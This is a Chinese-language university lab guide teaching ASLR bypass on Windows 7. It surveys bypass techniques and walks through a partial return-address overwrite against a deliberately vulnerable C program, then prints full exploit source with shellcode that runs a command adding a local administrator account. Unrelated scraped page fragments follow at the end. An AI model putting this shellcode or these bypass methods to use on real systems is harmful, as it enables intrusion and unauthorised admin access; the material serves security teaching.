实验指导书

Size: px
Start display at page:

Download "实验指导书"

Transcription

1 从零开始学习软件漏洞挖掘系列教程第六篇 : 进击 ASLR 地址随机化 1 实验简介 实验所属系列 : 系统安全 实验对象 : 本科 / 专科信息安全专业 相关课程及专业 : 计算机网络 实验时数 ( 学分 ):2 学时 实验类别 : 实践实验类 2 实验目的 通过该实验了解绕过 ASLR 的方法 3 预备知识 1. 关于 ASLR 的一些基础知识 ASLR(Address space layout randomization) 是一种针对缓冲区溢出的安全保护技术, 通过对堆 栈 共享库映射等线性区布局的随机化, 通过增加攻击者预测目的地址的难度, 防止攻击者直接定位攻击代码位置, 达到阻止溢出攻击的目的 2. 如何配置 ASLR ASLR 的实现需要程序自身的支持和操作系统的双重支持 在 Windows Vista 后 ASLR 开始发挥作用 同时微软从 VS2005 SP1 开始加入 /dyanmicbase 链接选项帮助程序启用 ASLR 4 实验环境 服务器 :Windows 7 SP1,IP 地址 : 随机分配 辅助工具 :Immunity Debugger 调试器,mona.py 5 实验步骤

2 前面我们的漏洞利用很多都是基于一个事实 : 硬编码 jmp esp 或 pop pop retn 地址 所谓惹不起躲得起, 为微软的 ASLR 技术就是通过加载程序时不再使用固定的基地址, 从而干扰 shellcode 定位的一种技术 ASLR 发挥作用后, 简单的用 jmp esp 或 pop pop retn 的方法将无法利用成功, 因为 jmp esp 或者 pop pop retn 地址每次重启机器都会变化 然而攻击者已经用事实告诉我们,ASLR 并非不可绕过 我们的任务分为 2 个部分 : 1. 介绍常见的绕过 ASLR 技术 2. 用其中一种技术实战演示 5.1 实验任务一 任务描述 : 了解常见绕过 ASLR 技术 首先, 在开始之前 我想告诉你一件事 :ASLR 只是随机了地址的一部分, 如果你重启后观察加载的模块基地址你会注意到只有地址的高字节随机, 当一个地址保存在内存中, 例如 :0x , 当启用了 ASLR 技术, 只有 : 12 和 34 是随机 换句话说,0x 在重启后会变成 0xXXXX5678(XXXX 随机值 ) 在某些情况下, 这可能使黑客利用 / 触发执行任意代码 想象一下, 当你攻击一个允许覆盖栈中返回地址的漏洞, 原来固定的返回地址被系统放在栈中, 而如果启用 ASLR, 被随机处理后的地址被放置在栈中, 比方说返回地址是 0x (0x1234 是被随机部分,5678 始终不变 ), 如果我们可以在 XXXX(1234 是随机的, 但嘿 - 操作系统已经把他们放在栈中了 ) 空间中找到有趣的代码 ( 例如 JMP ESP 或其他有用的指令 ) 我们只需要在低字节所表示的地址范围内找到有趣的指令并用这些指令的地址替换掉栈中的低字节 让我们看下下面的 test1.exe 程序, 你可以在 C:\ 找到, 在调试器中打开 test1.exe 并查看加载模块的基地址

3 重启并执行相同的操作 :

4 注意比较这两个图 比如重启前的 test 模块加载的基地址是 0x , 重启后 test 模块加载的基地址是 0x012D0000 看到了吧, 只有加载地址的两个高字节被随机化, 所以当你需要使用这些模块的地址时, 无论如何也不能直接使用这些地址, 因为它会在重启后改变 常见的绕过 ASLR 技术 : 1. 使用未受 ASLR 保护模块的地址 地址随机化只会出现在有 ASLR 保护的模块, 如果某个模块没有 ASLR 保护, 那么我们任然可以使用该模块的 jmp esp,pop pop retn 等地址 我们可以使用 Immunity Debugger 的 mona.py 插件来查看未开启 aslr 保护的模块, 用 Immunity Debugger 载入 test2.exe, 运行 ( 在 C:\ 可以找到 ) 然后在底部输入 :!mona noaslr 在这个例子中只有我们的 test2.exe 没有 aslr 很多时候程序都自带有许多.dll 文件, 这些文件往往没有 aslr 保护, 你任然可以利用它们里面的地址 2. 利用 Heap spray 技术定位内存地址 这种技术的思路就是如果我们可以在应用程序内申请足够大的内存 例如申请到的地址覆盖到 0x0c0c0c0c, 那么我们总可以把返回地址覆盖为 0x0c0c0c0c, 然后在 0x0c0c0c0c 放上我们的 shellocde, 程序返回时直接去执行 shellocde, 无视 aslr 3. 猜测随机地址, 暴力破解等等 4. Tombkeeper 在 CanSecWest 2013 上提出的基于 SharedUserData 的方法从 Windows NT 4 到 Windows 8,SharedUserData 的位置一直固定在地址 0x7ffe0000 上 从 WRK 源代码中 nti386.h 以及 ntamd64.h 可以看出 : #define MM_SHARED_USER_DATA_VA 0x7FFE0000 在 x86 Windows 上, 通过 Windbg, 可以看到 : 0:001> dt _KUSER_SHARED_DATA SystemCall 0x7ffe0000 ntdll!_kuser_shared_data SystemCall : 0x774364f0 0x7ffe0300 总是指向 KiFastSystemCall 0:001> uf poi(0x7ffe0300) ntdll!kifastsystemcall: f0 8bd4 mov edx,esp f2 0f34 sysenter f4 c3 ret 反汇编 NtUserLockWorkStation 函数, 发现其就是通过 7ffe0300 进入内核的 : 0:001> uf USER32!NtUserLockWorkStation USER32!NtUserLockWorkStation:

5 75f70fad b8e mov eax,11e6h 75f70fb2 ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300) 75f70fb7 ff12 call dword ptr [edx] 75f70fb9 c3 ret 这样, 在触发漏洞前合理布局寄存器内容, 用函数在系统服务 (SSDT / Shadow SSDT) 中服务号填充 EAX 寄存器, 然后让 EIP 跳转到对应的地方去执行, 就可以调用指定的函数了 但是也存在很大的局限性 : 仅仅工作于 x86 Windows 上 ; 几乎无法调用有参数的函数 64 位 Windows 系统上 0x7ffe0350 总是指向函数 ntdll!ldrhotpatchroutine HotPatchBuffer 结构体的定义如下 : struct HotPatchBuffer ULONG NotSoSure01; // & != 0 ULONG NotSoSure02; USHORT PatcherNameOffset; // 结构体相对偏移地址 USHORT PatcherNameLen; USHORT PatcheeNameOffset; USHORT PatcheeNameLen; USHORT UnknownNameOffset; USHORT UnknownNameLen ; LdrHotPatchRoutine 调用方式 : void LdrHotPatchRoutine (struct *HotPatchBuffer); 在触发漏洞前合理布局寄存器内容, 合理填充 HotPatchBuffer 结构体的内容, 然后调用 LdrHotPatchRoutine 如果是网页挂马, 可以指定从远程地址加载一个 DLL 文件 ; 如果已经经过其他方法把 DLL 打包发送给受害者, 执行本地加载 DLL 即可 此方法通常需要 HeapSpray 协助布局内存数据 ; 且需要文件共享服务器存放恶意 DLL; 只工作于 64 位系统上的 32 位应用程序 ; 不适用于 Windows 8 5. 利用内存信息泄漏通过获取内存中某些有用的信息, 或者关于目标进程的状态信息, 攻击者通过一个可用的指针就有可能绕过 ASLR 这种方法还是十分有效的, 主要原因如下 : (1) 可利用指针检测对象在内存中的映射地址 比如栈指针指向内存中某线程的栈空间地址, 或者一静态变量指针可泄露出某一特定 DLL/EXE 的基址 (2) 通过指针推断出其他附加信息 比如栈桢中的桢指针不仅提供了某线程栈空间地址, 而且提供了栈桢中的相关函数, 并可通过此指针获得前后栈桢的相关信息 再比如一个数据段指针, 通过它可以获得其在内存中的映像地址, 以及单数据元素地址 若是堆指针还可获得已分配的数据块地址, 这些信息在程序攻击中还是着为有用的 在 Vista 系统的 ASLR 中, 信息泄漏的可用性更广了 如果攻击者知道内存中某一映射地址, 那么他不仅可获取对应进程中的 DLL 地址, 连系统中运

6 行的所有进程也会遭殃 因为其他进程在重新加载同一 DLL 时, 是通过特定地址上的 _MiImageBitMap 变量来搜索内存中的 DLL 地址的, 而这一 bitmap 又被用于所有进程, 因此找到一进程中某 DLL 的地址, 即可在所有进程的地址空间中定位出该 DLL 地址 6. 部分覆盖返回地址 这种技术在 2007 年 3 月的著名的动画光标漏洞 (MS Advisory ) 利用中得到了使用. 这个漏洞是 Alex Sotirov 发现 下面的链接介绍了这个漏洞的一些信息 : 和 Metasploit- Exploiting the ANI vulnerability on Vista 这个漏洞的 exploit 第一次在 Vista 上绕过了 ASLR 保护 我们下面就演示这种技术 练习 关于 ASLR, 以下说法正确的是? 单选题 A ASLR 使得每次重新载入程序后基地址都变化 B strcpy 可以控制的地址范围是 0x XXXX0000-0xXXXXFFFF C ASLR 通过随机化基址增加攻击难度 D Heap spray 技术是通过把返回地址覆盖为 0x0c0c0c0c 利用 答案 :C 5.2 实验任务二 任务描述 : 利用部分覆盖定位内存地址 前面我们说过 :ASLR 只是随机了地址的一部分, 如果你重启后观察加载的模块基地址, 你会注意到只有地址的高字节随机 比如 0x 这个地址,0x1234 是随机的, 我们不用去管它, 操作系统会帮我们放到栈中, 但 0x5678 是固定的, 那么我们可以覆盖它最后的两个字节, 如果通过 memcpy 函数攻击的话就可以把这个返回地址控制为 0x x1234ffff 中的任意一个 如果通过 strcpy 函数攻击, 因为 strcpy 会自动在复制结束后添加 0x00, 所以我们能控制的地址为 0x x123400ff 用于演示这项技术的代码如下 : #include "stdafx.h" #include "windows.h" int test(char *str) char buffer[256]; memcpy(buffer,str,262); _asm lea edx,buffer

7 return 0; int main() test("\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90"); //262 字节 _asm jmp edx return 0; 为了方便演示, 我用 vs2010 并且关闭 GS,DEP 编译选项编译, 你可以在 C:\ 找到这个 test3.exe 文件 用 Immunity Debugger 载入

8 定位到 test 函数代码 注 : 你看到的地址和我的不一样, 因为 aslr 作用 注意观察此时 test 函数的返回地址是 0x008D103D, 然后执行到下面的 retn

9 你再观察此时的返回地址变成了 0x008D9090, 返回地址前面也被覆盖为 \x 也就是说, 我们的输入造成了缓冲区溢出, 刚好把返回地址的低两个字节覆盖为 \x90\x90 了 然而前面我们知道, 低两个字节是固定的所以我们可控的返回地址为 0x008D0000 到 0x008DFFFF, 如果我们能在这个地址范围内找到 jmp esp 指令. 但是注意!!!jmp esp 跳到 shellcode 的办法在这里并不能用 因为我们不能覆盖到返回地址的高两个字节以下, 一但覆盖了返回地址的高字节, 那么返回地址我们将不可控, 因为我们硬编码了返回地址, 而这个地址对应的指令是未知的, 因此 shellocde 不能布置在返回地址后面, 所以不能用 jmp esp 的办法跳到 shellcode 显然, 我们可以把 shellcode 放到返回地址前面, 然后把返回地址覆盖为跳到 shellcode 指令的地址 如果此时有某个寄存器指向我们的 \x90\x90\x90.. 也就是 buffer 局部变量的起始地址或者起始地址下面, 我们就可以用 jmp 该寄存器指令的地址覆盖返回地址 如果你注意看此时的寄存器窗口

10 会发现 EDX=0x0036FA58, 而这个地址正是我们 buffer 的起始地址 因此, 我们可以在 0x008D0000-0x008DFFFF 的范围内找到一条 jmp edx 指令, 用 jmp edx 指令地址覆盖返回地址, 就可以成功跳到我们可控的缓冲区 很快我在 0x008D1040 找到了一条, 它的高两个字节不用管, 系统会自动帮我们加上

11 下面构造我们的 Exploit: 用 \x10\x40 替换我们前面源码的最后两个 \x90\x90, 把 \x10\x40 前面的 \x90 用我们的 shellcode 替换, 不足的用 \x90 填充 所以完整的 Exploit 是 : #include "stdafx.h" #include "windows.h" int test(char *str) char buffer[256]; memcpy(buffer,str,262); _asm lea edx,buffer return 0; int main() test("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\ x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x5 7\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x 57\x69\x6e\x45\x75\xf2\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\ xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f\ x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x6 8\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\ x6f\x68\x26\x20\x6e\x65\x68\x44\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f \x4b\x33\x68\x33\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x 65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e \x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x40\x10"); //262 字节 _asm

12 jmp edx return 0; 你可以在 C 盘找到这个 test4.exe, 运行它 似乎 shellcode 没有成功执行 我们动态跟踪一下, 用调试器载入, 来到 test 函数

13 到这里看起来都还正常啊, 能执行到我们的 shellcode, 继续往下单步执行

14 执行到这一句 001BF9CB 202F AND BYTE PTR DS:[EDI],CH 就无法继续, 程序显示发生访问异常 原来是我们的 shellcode 出问题了, 现在你所要做的, 就是重新找一个 shellcode 替换前面的 shellcode 就好了 到这里, 我们控制了程序流程, 成功绕过 ASLR 然而你会发现, 实际上 ASLR 已经给攻击者造成了非常多的麻烦, 如我们在源码中加入 _asm lea edx,buffer 才使得 EDX 刚好指向我们的 shellocde, 实际中你也许并不能找到某个寄存器指向我们的 shellcode, 也许你足够幸运的话或许有, 这纯考验人品 所以当你在绕过 ASLR 中, 发现某个模块没有开启 ASLR( 包括系统模块和程序自带 dll, 但是注意截断符 \x00), 不用想了, 直接用它们

15 练习 以下说法不正确的是 : 单选题 A 可以攻击未启用 ASLR 模块绕过 ASLR 保护 B 部分覆盖返回地址绕过 ASLR 技术可以把 shellcode 放在返回地址后面 C 可以覆盖 SEH 异常处理绕过 ASLR D 在 Win7 默认开启了 ASLR 保护机制答案 :B 6 实验报告要求 参考实验原理与相关介绍, 完成实验任务, 并对实验结果进行分析, 完成思考题目, 总结实验的心得体会, 并提出实验的改进意见 7 分析与思考 1) 本题如何利用未开启 ASLR 模块绕过 ASLR 机制保护 8 配套学习资源

实验指导书

实验指导书 1 实验简介 从零开始学习软件漏洞挖掘系列教程第四篇 : 绕过 GS 机制 实验所属系列 : 系统安全 实验对象 : 本科 / 专科信息安全专业 相关课程及专业 : 计算机网络 实验时数 ( 学分 ):2 学时 实验类别 : 实践实验类 2 实验目的 通过该实验了解绕过 GS 机制的方法, 能够在开启程序 GS 编译的情况下成功利用 3 预备知识 1. 关于 GS 的一些基础知识针对缓冲区溢出覆盖函数返回地址这一特征,

More information

Microsoft PowerPoint - XCon2010_win7_cn.ppt [兼容模式]

Microsoft PowerPoint - XCon2010_win7_cn.ppt [兼容模式] 绕过 windows 7 浏览器内存保护 Chen XiaoBo Xiao_Chen@McAfee.com Xie Jun Jun_Xie@McAfee.com com Windows 保护机制回顾 GS Stack cookies 防止覆盖 EIP 可以通过覆盖 SEH chains 来绕过 /GS 保护 SafeSEH & SEHOP SEH handler 验证 可以通过已注册的 SEH handler

More information

要 及 时 为 入 党 积 极 分 子 确 定 两 名 培 养 联 系 人, 进 行 联 络 帮 助 要 定 期 ( 每 季 度 至 少 一 次 ) 听 取 培 养 联 系 人 的 思 想 和 工 作 情 况 汇 报, 及 时 完 成 入 党 积 极 分 子 登 记 表 ( 见 附 件 2) 的 填

要 及 时 为 入 党 积 极 分 子 确 定 两 名 培 养 联 系 人, 进 行 联 络 帮 助 要 定 期 ( 每 季 度 至 少 一 次 ) 听 取 培 养 联 系 人 的 思 想 和 工 作 情 况 汇 报, 及 时 完 成 入 党 积 极 分 子 登 记 表 ( 见 附 件 2) 的 填 中 共 兰 州 资 源 环 境 职 业 技 术 学 院 委 员 会 文 件 兰 资 环 院 党 发 2016 40 号 关 于 进 一 步 规 范 党 员 发 展 工 作 和 从 严 管 理 党 员 的 通 知 各 系 党 总 支 支 部 : 为 进 一 步 规 范 和 加 强 发 展 党 员 工 作, 从 严 管 理 党 员, 确 保 发 展 党 员 质 量, 提 高 各 基 层 党 组 织 的

More information

<4D6963726F736F667420576F7264202D20C8EDBCFEB9A4B3CCCFEEC4BFD0E8C7F3B5F7D1D0B1A8B8E6B7B6B1BE>

<4D6963726F736F667420576F7264202D20C8EDBCFEB9A4B3CCCFEEC4BFD0E8C7F3B5F7D1D0B1A8B8E6B7B6B1BE> 机 遇 创 造 发 展 科 技 造 就 成 功 软 件 工 程 项 目 需 求 调 研 报 告 ( 范 本 ) ( 调 研 时 间 :0000-00-00 至 0000-00-00) 深 圳 市 易 讯 诚 信 息 技 术 有 限 公 司 调 研 报 告 简 要 说 明 XXX 公 司 软 件 工 程 项 目 需 求 调 研 报 告 是 根 据 XXX 公 司 现 有 管 理 体 系 整 理 而 成,

More information

实验指导书

实验指导书 从零开始学习软件漏洞挖掘系列教程第三篇 : 利用 SEH 机制 Exploit it 1 实验简介 实验所属系列 : 系统安全 实验对象 : 本科 / 专科网络 / 信息安全专业 相关课程及专业 : 计算机网络, 信息安全 实验时数 ( 学分 ):2 学时 实验类别 : 实践实验类 2 实验目的 在传统的缓冲区溢出中, 我们可以通过覆盖返回地址以跳转到 shellcode 但并不是所有的溢出都是那么简单的

More information

------------------------------- 6 --------------------22 ------------------------------23 ---------------------------------- 24 1. ----------------------------------25 2. --------------------26 -------------------------------

More information

ROP_bamboofox.key

ROP_bamboofox.key ROP Return Oriented Programming Lays @ BambooFox Who Am I Lays / L4ys / 累死 - l4ys.tw Reverse Engineering BambooFox / HITCON Outline Buffer Overflow ret2libc / ret2text Return Oriented Programming Payload

More information

1

1 1 2 3 4 5 GNUDebugger 6 7 void main(int argc, char **argv){ vulncpy(argv[1]); return; } void vulncpy(char *a){ char buf[30]; strcpy(buf, a); return; } *argv[1] buf Shellcode *argv[1]... &buf &buf 8 strcpy

More information

inc-by-one 之高级漏洞利用技术 By Netfairy 前言 什么是 inc-by-one? 比如有这样的一条指令 :inc dword ptr [eax+8], 这条指令执行的效果是 使 eax+8 地址处的值加 1, 类似于 c 语言 *(eax+8) = *(eax+8) +1, 如

inc-by-one 之高级漏洞利用技术 By Netfairy 前言 什么是 inc-by-one? 比如有这样的一条指令 :inc dword ptr [eax+8], 这条指令执行的效果是 使 eax+8 地址处的值加 1, 类似于 c 语言 *(eax+8) = *(eax+8) +1, 如 inc-by-one 之高级漏洞利用技术 By Netfairy 前言 什么是 inc-by-one? 比如有这样的一条指令 :inc dword ptr [eax+8], 这条指令执行的效果是 使 eax+8 地址处的值加 1, 类似于 c 语言 *(eax+8) = *(eax+8) +1, 如果我们可以控制 eax 的值, 那么这就是一个 inc-by-one 漏洞 利用方法 1. 布置堆内存这里我以

More information

实验指导书

实验指导书 从零开始学习软件漏洞挖掘系列教程第七篇 : 实战挖掘 Mini-stream Ripper 缓冲区溢出漏洞 1 实验简介 实验所属系列 : 系统安全 实验对象 : 本科 / 专科信息安全专业 相关课程及专业 : 计算机网络 实验时数 ( 学分 ):2 学时 实验类别 : 实践实验类 2 实验目的 通过利用一个存在漏洞的程序, 巩固前面学过的知识 注意 由于环境原因, 你在实验看到的地址和我的不一样,

More information

来 正 式 组 织 关 系 转 出 后 未 收 到 组 织 关 系 介 绍 信 回 执 的 党 员 排 查 的 主 要 任 务 是, 核 查 党 员 身 份 信 息, 摸 清 流 动 党 员 底 数, 理 顺 党 员 组 织 关 系, 健 全 完 善 党 员 档 案, 对 与 党 组 织 失 去 联

来 正 式 组 织 关 系 转 出 后 未 收 到 组 织 关 系 介 绍 信 回 执 的 党 员 排 查 的 主 要 任 务 是, 核 查 党 员 身 份 信 息, 摸 清 流 动 党 员 底 数, 理 顺 党 员 组 织 关 系, 健 全 完 善 党 员 档 案, 对 与 党 组 织 失 去 联 中 共 宁 波 市 鄞 州 区 教 育 局 委 员 会 文 件 甬 鄞 教 党 2016 11 号 中 共 宁 波 市 鄞 州 区 教 育 局 委 员 会 关 于 开 展 党 员 组 织 关 系 集 中 排 查 的 通 知 各 区 属 学 校 ( 单 位 ) 党 组 织, 局 机 关 党 总 支 : 为 贯 彻 落 实 全 面 从 严 治 党 要 求, 严 格 党 员 日 常 教 育 管 理 监 督,

More information

#!/usr/bin/python -w filename="evil.plf" buffer = "A"*2000 textfile = open(filename, 'w') textfile.write(buffer) textfile.close() 创建 plf 文件, 用 immunit

#!/usr/bin/python -w filename=evil.plf buffer = A*2000 textfile = open(filename, 'w') textfile.write(buffer) textfile.close() 创建 plf 文件, 用 immunit 结构化异常处理 (SEH) 译者 :Netfairy 前言 这一节介绍漏洞利用中你会遇到的真正障碍. SEH 用于缓解缓冲区攻击造成的问题. 但它也 是有缺陷的. 先说明本文不会讨论 SafeSeh 或者 SEHOP, 稍后的 Part 3b 会解决这些保护机制. 我将用 DVD X Player 5.5 PRO 演示 SEH 利用. 已有的漏洞利用程序 : 这里 通常情况下漏洞利用之前我们需要先分析程序的坏字符,

More information

目 录 总 览... 1 一 现 场 测 试 工 作 流 程 图... 1 二 现 场 测 试 工 作 人 员 及 主 要 职 责... 2 第 一 部 分 测 试 程 序 与 要 求... 3 一 领 取 试 卷... 3 二 学 生 检 录... 4 三 学 生 数 学 测 试... 6 ( 一

目 录 总 览... 1 一 现 场 测 试 工 作 流 程 图... 1 二 现 场 测 试 工 作 人 员 及 主 要 职 责... 2 第 一 部 分 测 试 程 序 与 要 求... 3 一 领 取 试 卷... 3 二 学 生 检 录... 4 三 学 生 数 学 测 试... 6 ( 一 2015 年 国 家 义 务 教 育 质 量 监 测 现 场 操 作 手 册 ( 供 现 场 工 作 人 员 使 用 ) 国 务 院 教 育 督 导 委 员 会 办 公 室 教 育 部 基 础 教 育 质 量 监 测 中 心 2015 年 4 月 目 录 总 览... 1 一 现 场 测 试 工 作 流 程 图... 1 二 现 场 测 试 工 作 人 员 及 主 要 职 责... 2 第 一 部

More information

<4D6963726F736F667420576F7264202D20D0A3C6F3BACFD7F7A1B0B6A9B5A5B0E0A1B1B9DCC0EDB9E6B6A8A3A8CAD4D0D0A3A92E646F63>

<4D6963726F736F667420576F7264202D20D0A3C6F3BACFD7F7A1B0B6A9B5A5B0E0A1B1B9DCC0EDB9E6B6A8A3A8CAD4D0D0A3A92E646F63> 广 东 机 电 职 业 技 术 学 院 院 校 企 办 通 2014 2 号 校 长 办 公 室 关 于 印 发 广 东 机 电 职 业 技 术 学 院 校 企 合 作 订 单 班 管 理 规 定 ( 试 行 ) 的 通 知 各 二 级 单 位 : 广 东 机 电 职 业 技 术 学 院 校 企 合 作 订 单 班 管 理 规 定 ( 试 行 ) 已 经 校 长 办 公 会 通 过, 现 予 印 发,

More information

实验指导书

实验指导书 从零开始学习软件漏洞挖掘系列教程第一篇 : 工欲善其事必先利其器 1 实验简介 实验所属系列 : 系统安全 实验对象 : 本科 / 专科信息安全专业 相关课程及专业 : 计算机网络 实验时数 ( 学分 ):2 学时 实验类别 : 实践实验类 2 实验目的 通过动手做一些实践, 熟悉常用的软件漏洞挖掘工具, 能在日后的软件漏洞挖掘做到游刃有余 3 预备知识 1. 关于 Immunity Debugger

More information

发展党员材料填写参考(上网).doc

发展党员材料填写参考(上网).doc 华 中 科 技 大 学 党 员 发 展 材 料 填 写 参 考 中 共 华 中 科 技 大 学 委 员 会 组 织 部 2010 年 3 月 31 日 目 录 1 党 员 发 展 材 料 一 览 表... 1 2 入 党 志 愿 书 填 写 参 考... 2 3 申 请 入 党 积 极 分 子 培 养 考 察 登 记 表 填 写 参 考... 13 4 华 中 科 技 大 学 发 展 党 员 综 合

More information

1.加入党组织主要经过哪些程序?

1.加入党组织主要经过哪些程序? 内 部 资 料 注 意 保 存 厦 门 大 学 发 展 党 员 工 作 常 用 文 书 中 共 厦 门 大 学 委 员 会 组 织 部 编 印 2014 年 10 月 4 发 展 党 员 工 作 流 程 图 一 申 请 入 党 二 入 党 积 极 分 子 的 三 发 展 对 象 的 确 定 四 预 备 党 员 的 接 收 五 预 备 党 员 的 教 育 确 定 和 培 养 教 育 和 考 察 考 察

More information

【结构化面试名师精品班2ATY15K002】讲义.docx

【结构化面试名师精品班2ATY15K002】讲义.docx 李 曼 卿 带 大 家 学 面 试 李 曼 卿 } 我 们 党 历 来 高 度 重 视 选 贤 任 能, 始 终 把 选 人 用 人 作 为 关 系 党 和 人 民 事 业 的 关 键 性 根 本 性 问 题 来 抓 好 干 部 要 做 到 信 念 坚 定 为 民 服 务 勤 政 务 实 敢 于 担 当 清 正 廉 洁 2013 年 6 月 28 日, 全 国 组 织 工 作 会 议 第 0 页 目

More information

C++ 程序设计 告别 OJ1 - 参考答案 MASTER 2019 年 5 月 3 日 1

C++ 程序设计 告别 OJ1 - 参考答案 MASTER 2019 年 5 月 3 日 1 C++ 程序设计 告别 OJ1 - 参考答案 MASTER 2019 年 月 3 日 1 1 INPUTOUTPUT 1 InputOutput 题目描述 用 cin 输入你的姓名 ( 没有空格 ) 和年龄 ( 整数 ), 并用 cout 输出 输入输出符合以下范例 输入 master 999 输出 I am master, 999 years old. 注意 "," 后面有一个空格,"." 结束,

More information

条 件 的 限 制, 可 在 广 西 参 加 普 通 高 考, 特 指 不 受 学 籍 户 籍 迁 入 的 年 限 限 制, 但 在 高 考 报 名 时 考 生 的 学 籍 户 籍 必 须 已 迁 入 广 西 二 外 来 人 员 需 要 提 供 的 审 查 材 料 ( 一 ) 按 照 自 治 区 招

条 件 的 限 制, 可 在 广 西 参 加 普 通 高 考, 特 指 不 受 学 籍 户 籍 迁 入 的 年 限 限 制, 但 在 高 考 报 名 时 考 生 的 学 籍 户 籍 必 须 已 迁 入 广 西 二 外 来 人 员 需 要 提 供 的 审 查 材 料 ( 一 ) 按 照 自 治 区 招 广 西 壮 族 自 治 区 南 宁 市 招 生 考 试 院 南 招 考 院 2015 25 号 关 于 做 好 外 来 务 工 人 员 随 迁 子 女 和 外 省 户 籍 学 籍 迁 入 人 员 在 南 宁 市 参 加 2016 年 普 通 高 考 全 国 统 考 报 名 资 格 审 查 工 作 的 通 知 各 县 招 生 办, 市 区 各 普 通 高 中 中 职 学 校 : 按 照 自 治 区 招

More information

2 3.1 3.2 3.3 3.4 3.5 4.1 4.2 4.3 4.4 4.5 5.1 5.2 5.3 1957 2 7.1 7.2 7.3

2 3.1 3.2 3.3 3.4 3.5 4.1 4.2 4.3 4.4 4.5 5.1 5.2 5.3 1957 2 7.1 7.2 7.3 1 1.1 1.2 2.1 2.2 2 3.1 3.2 3.3 3.4 3.5 4.1 4.2 4.3 4.4 4.5 5.1 5.2 5.3 1957 2 7.1 7.2 7.3 3 6 9.1 9.2 9.3 10.1 10.2 10.3 10.4 11.1 11.2 11.3 11.4 12.1 12.2 12.3 12.4 4 13.1 13.2 13.3 14.1 14.2 1962 14.3

More information

Microsoft Word - 会协(2016)16号.doc

Microsoft Word - 会协(2016)16号.doc 中 国 注 册 会 计 师 协 会 文 件 会 协 2016 16 号 中 国 注 册 会 计 师 协 会 关 于 开 展 2016 年 会 计 师 事 务 所 执 业 质 量 检 查 工 作 的 通 知 各 省 自 治 区 直 辖 市 注 册 会 计 师 协 会 : 根 据 中 注 协 会 计 师 事 务 所 执 业 质 量 检 查 制 度 ( 会 协 2011 39 号 ) 要 求, 在 总 结

More information

Static Enforcement of Security with Types

Static Enforcement of Security with Types 例题 1 一个 C 语言程序及其在 X86/Linux 操作系统上的编译结 果如下 根据所生成的汇编程序来解释程序中四个变 量的存储分配 生存期 作用域和置初值方式等方面 的区别 static long aa = 10; short bb = 20; func( ) { } static long cc = 30; short dd = 40; static long aa = 10; func(

More information

Slide 1

Slide 1 1 分钟用 Java 原生层漏洞搞定 Win7+JRE7 一个漏洞, 三种利用 今天我们不会讲如何挖掘 Java 原生 层漏洞, 而是讲如何 料理 它们 自我介绍 趋势科技中国研发中心, 架构师 研究方向包括 漏洞挖掘, 沙盒技术, APT 攻击解决方案 重度动漫宅 议程 背景介绍 今天要使用的漏洞 Exploit 方法 1 Exploit 方法 2 Exploit 方法 3 总结 何为 Java

More information

Linux kernel exploit研究和探索

Linux kernel exploit研究和探索 Linux kernel exploit DOC alert7 PPT e4gle 2002-12-2 1 2002-12-2 2 Linux kernel exploit kernel exploit exploit exploit exploit (Kernel Buffer Overflow) (Kernel

More information

桂城街道2014年公办小学入学指南

